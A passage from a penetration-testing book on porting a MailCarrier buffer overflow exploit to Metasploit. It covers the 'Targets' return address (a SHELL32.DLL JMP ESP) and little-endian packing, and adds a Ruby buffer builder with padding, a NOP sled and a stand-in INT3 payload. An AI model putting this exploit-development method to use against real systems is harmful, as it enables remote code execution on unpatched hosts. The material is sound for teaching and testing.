
Porting Exploits to the Metasploit Framework

221

Figure 15-1: MailCarrier initial overwrite

Implementing Features of the Framework

Having proved that the basic skeleton of the module works by overwriting EIP with our own value, we can start to implement the features of the Framework. We begin by setting the target return address (the 'Ret' value in the following example) in the 'Targets' block to the address of a JMP ESP instruction. This is the same address that was used in the original exploit; it is found in SHELL32.DLL on Windows XP SP2. We need a legitimate return address for the operating system we are targeting, or our code will never execute. Remember that some exploits work only on specific operating systems, as is the case with this one: we are using an address from SHELL32.DLL, which changes across Windows versions and service packs. If we could find a JMP ESP inside the application's own modules, we would not need to depend on a Windows DLL and could make this exploit work on all Windows platforms, because that address would stay the same everywhere the application runs (provided the module is loaded at a fixed base and is not subject to rebasing or ASLR).

'Targets' =>
       [
              [ 'Windows XP SP2 - EN', { 'Ret' => 0x7d17dd13 } ],
       ],

Metasploit inserts the selected target's return address into the exploit at run time. In the exploit block, replace the hard-coded return address with

[target['Ret']].pack('V')

This packs the target's return address into the buffer as four bytes in little-endian order, least significant byte first, so 0x7d17dd13 becomes "\x13\xdd\x17\x7d". (Byte order is dictated by the target CPU's architecture; Intel-compatible processors use little-endian ordering, which is exactly what the 'V' pack directive produces.)
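To make the 'Targets' lookup and the pack('V') conversion concrete, here is a small added example in the same Ruby the Framework uses. It is not code from the book or from the Metasploit module: the EIP_OFFSET value, the payload and the NOP-sled length are assumed for illustration, while the target name and return address are the ones given above. It builds the overflow buffer the way a ported module would and then reads the four bytes at the EIP offset back as the CPU would, to confirm that the value we meant to put in EIP is the one that lands there.

```ruby
# Added example: turning a Metasploit-style 'Targets' entry into the bytes
# that overwrite the saved return address. Not taken from the book or the
# MailCarrier module.

# Same shape as an exploit module's 'Targets' array: [name, options].
# The address is the JMP ESP in SHELL32.DLL quoted in the text.
TARGETS = [
  ['Windows XP SP2 - EN', { 'Ret' => 0x7d17dd13 }],
].freeze

# Number of padding bytes before the saved return address is overwritten.
# Assumed value for illustration only, not the real MailCarrier offset.
EIP_OFFSET = 5093

# pack('V') emits a 32-bit value least significant byte first (little-endian),
# which is how an x86 CPU expects the return address to sit in memory.
def ret_bytes(target)
  [target['Ret']].pack('V')
end

# Build the overflow buffer: padding up to EIP, the return address, then a
# NOP sled and the payload that the JMP ESP lands on. Everything is forced
# to binary (.b) so Ruby does not complain about mixing string encodings.
def build_buffer(target, payload, nops: 16)
  buf  = ('A' * EIP_OFFSET).b
  buf << ret_bytes(target)
  buf << ("\x90".b * nops)
  buf << payload.b
  buf
end

# Read the 4 bytes at EIP_OFFSET back as a little-endian 32-bit integer,
# i.e. the value the CPU would load into EIP on RET.
def eip_value(buf)
  buf[EIP_OFFSET, 4].unpack1('V')
end

if __FILE__ == $PROGRAM_NAME
  name, opts = TARGETS[0]
  buf = build_buffer(opts, "\xcc".b * 4)   # INT3 stand-in for real shellcode
  puts "#{name}: Ret bytes = #{ret_bytes(opts).unpack1('H*')}"
  puts "EIP would be 0x#{eip_value(buf).to_s(16)}"
end
```

Swapping the 'Windows XP SP2 - EN' entry for another target changes only the 'Ret' value; the buffer-building code stays the same, which is the point of keeping the return address in the 'Targets' block rather than hard-coding it in the exploit body.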